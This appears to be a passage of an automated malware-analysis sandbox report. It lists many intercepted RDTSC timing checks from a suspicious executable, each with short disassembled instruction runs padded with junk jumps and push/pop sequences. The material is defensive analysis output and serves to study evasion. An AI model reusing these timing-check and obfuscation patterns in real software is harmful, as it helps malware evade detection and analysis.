Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D75358 second address: D75367 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7620C9DE4Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D797B0 second address: D797BC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7620BAC876h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D797BC second address: D797C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D797C1 second address: D797C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D797C7 second address: D797CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D78BF8 second address: D78C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7620BAC876h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F7620BAC876h 0x00000015 jmp 00007F7620BAC882h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CCD537 second address: CCD547 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7620C9DE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CCD547 second address: CCD54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: CCD54B second address: CCD581 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7620C9DE46h 0x00000008 jmp 00007F7620C9DE4Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jmp 00007F7620C9DE59h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D78D8F second address: D78D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D78D9A second address: D78D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D78F1A second address: D78F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D78F1E second address: D78F38 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7620C9DE54h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D790A4 second address: D790AE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7620BAC876h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D79374 second address: D79378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D79378 second address: D79388 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007F7620BAC876h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D79388 second address: D793A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE54h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D793A0 second address: D793D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F7620BAC890h 0x0000000c jmp 00007F7620BAC884h 0x00000011 jnc 00007F7620BAC876h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F7620BAC880h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D793D8 second address: D793F8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 jmp 00007F7620C9DE52h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D793F8 second address: D793FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D8548E second address: D854A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7620C9DE54h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D85A4E second address: D85A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D85A52 second address: D85A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7620C9DE4Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F7620C9DE54h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D86180 second address: D8619A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC87Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F7620BAC882h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D8619A second address: D861A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D861A0 second address: D861A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D8B561 second address: D8B576 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE51h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D8E187 second address: D8E18C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D8E45A second address: D8E490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 jmp 00007F7620C9DE52h 0x0000000b jmp 00007F7620C9DE53h 0x00000010 pop ebx 0x00000011 pushad 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: D8E490 second address: D8E4AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ecx 0x0000000a jmp 00007F7620BAC882h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: DB3D70 second address: DB3D89 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7620C9DE46h 0x00000008 jmp 00007F7620C9DE4Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: DB3D89 second address: DB3DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7620BAC876h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F7620BAC876h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: DB3DA1 second address: DB3DA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: DB3DA5 second address: DB3DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7620BAC87Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: DB3DB6 second address: DB3DCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F7620C9DE46h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 jno 00007F7620C9DE46h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: DB493A second address: DB494E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7620BAC87Fh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: DB828C second address: DB82A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F7620C9DE4Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: DB82A0 second address: DB82AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 pushad 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: DB82AE second address: DB82D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007F7620C9DE48h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F7620C9DE51h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: DFBEF2 second address: DFBEF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: DFBEF7 second address: DFBF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7620C9DE46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: DFE707 second address: DFE70D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: E0D8C3 second address: E0D8C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: E0D8C7 second address: E0D8CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: EDA8F1 second address: EDA928 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F7620C9DE46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop eax 0x00000010 jmp 00007F7620C9DE4Bh 0x00000015 jmp 00007F7620C9DE55h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: EDA928 second address: EDA945 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 je 00007F7620BAC876h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F7620BAC881h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: EDAA9E second address: EDAAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: EDAAA4 second address: EDAAA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: EDAAA8 second address: EDAAAE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: EDB019 second address: EDB041 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7620BAC878h 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F7620BAC887h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: EDB041 second address: EDB071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7620C9DE58h 0x00000009 pop esi 0x0000000a push esi 0x0000000b jmp 00007F7620C9DE4Bh 0x00000010 jng 00007F7620C9DE46h 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: EDB071 second address: EDB088 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7620BAC882h 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: EDB33D second address: EDB36C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F7620C9DE57h 0x00000008 pop esi 0x00000009 jng 00007F7620C9DE48h 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jng 00007F7620C9DE7Ah 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: EDB36C second address: EDB370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: EDB370 second address: EDB393 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE56h 0x00000007 jg 00007F7620C9DE46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: EDCCDE second address: EDCCEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7620BAC876h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe RDTSC instruction interceptor: First address: EDCCEA second address: EDCCF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: EDCCF2 second address: EDCCF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: EDF61E second address: EDF622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: EDF622 second address: EDF628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: EDF900 second address: EDF941 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7620C9DE4Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F7620C9DE51h 0x00000012 push 00000004h 0x00000014 ja 00007F7620C9DE4Ch 0x0000001a push 2A42AE7Fh 0x0000001f push eax 0x00000020 push edx 0x00000021 js 00007F7620C9DE48h 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: EDFC66 second address: EDFC6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: EDFC6D second address: EDFCA6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7620C9DE48h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F7620C9DE52h 0x00000016 jmp 00007F7620C9DE53h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F00BD second address: 71F00F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 0D4856EDh 0x00000008 push esi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 mov dh, al 0x00000012 mov ah, bl 0x00000014 popad 0x00000015 mov eax, 08775315h 0x0000001a popad 0x0000001b mov ebx, dword ptr [eax+10h] 0x0000001e jmp 00007F7620BAC880h 0x00000023 xchg eax, esi 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F00F2 second address: 71F00F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F00F8 second address: 71F00FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F00FE second address: 71F0102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0102 second address: 71F0125 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7620BAC888h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0125 second address: 71F012B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F012B second address: 71F014A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7620BAC884h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F014A second address: 71F01B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 movsx ebx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [772406ECh] 0x00000011 jmp 00007F7620C9DE54h 0x00000016 test esi, esi 0x00000018 jmp 00007F7620C9DE50h 0x0000001d jne 00007F7620C9EC01h 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F7620C9DE4Dh 0x0000002c xor ecx, 530721D6h 0x00000032 jmp 00007F7620C9DE51h 0x00000037 popfd 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F01B2 second address: 71F01B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F01B7 second address: 71F01F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F7620C9DE56h 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 mov edi, 41966422h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F01F2 second address: 71F026D instructions: 0x00000000 rdtsc 0x00000002 mov si, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov si, di 0x0000000a popad 0x0000000b xchg eax, edi 0x0000000c pushad 0x0000000d call 00007F7620BAC887h 0x00000012 pushfd 0x00000013 jmp 00007F7620BAC888h 0x00000018 jmp 00007F7620BAC885h 0x0000001d popfd 0x0000001e pop eax 0x0000001f jmp 00007F7620BAC881h 0x00000024 popad 0x00000025 call dword ptr [77210B60h] 0x0000002b mov eax, 766BE5E0h 0x00000030 ret 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F7620BAC87Dh 0x00000038 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F026D second address: 71F0273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0273 second address: 71F02BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000044h 0x0000000a jmp 00007F7620BAC87Fh 0x0000000f pop edi 0x00000010 jmp 00007F7620BAC886h 0x00000015 xchg eax, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F7620BAC887h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F02BD second address: 71F02E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 mov dh, 6Ch 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F7620C9DE4Dh 0x00000011 xchg eax, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov edx, 3B31315Eh 0x0000001a mov ax, di 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F02E3 second address: 71F033B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC880h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [eax] 0x0000000b jmp 00007F7620BAC880h 0x00000010 mov eax, dword ptr fs:[00000030h] 0x00000016 jmp 00007F7620BAC880h 0x0000001b push dword ptr [eax+18h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F7620BAC887h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F033B second address: 71F0341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0341 second address: 71F0345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0388 second address: 71F03E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c jmp 00007F7620C9DE4Ch 0x00000011 call 00007F7620C9DE52h 0x00000016 jmp 00007F7620C9DE52h 0x0000001b pop eax 0x0000001c popad 0x0000001d je 00007F7690C6D114h 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 movsx ebx, cx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F03E6 second address: 71F03FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx esi, dx 0x00000009 popad 0x0000000a mov eax, 00000000h 0x0000000f pushad 0x00000010 mov dh, al 0x00000012 push eax 0x00000013 push edx 0x00000014 movsx ebx, ax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F03FD second address: 71F040C instructions: 0x00000000 rdtsc 0x00000002 mov edx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esi], edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F040C second address: 71F0421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
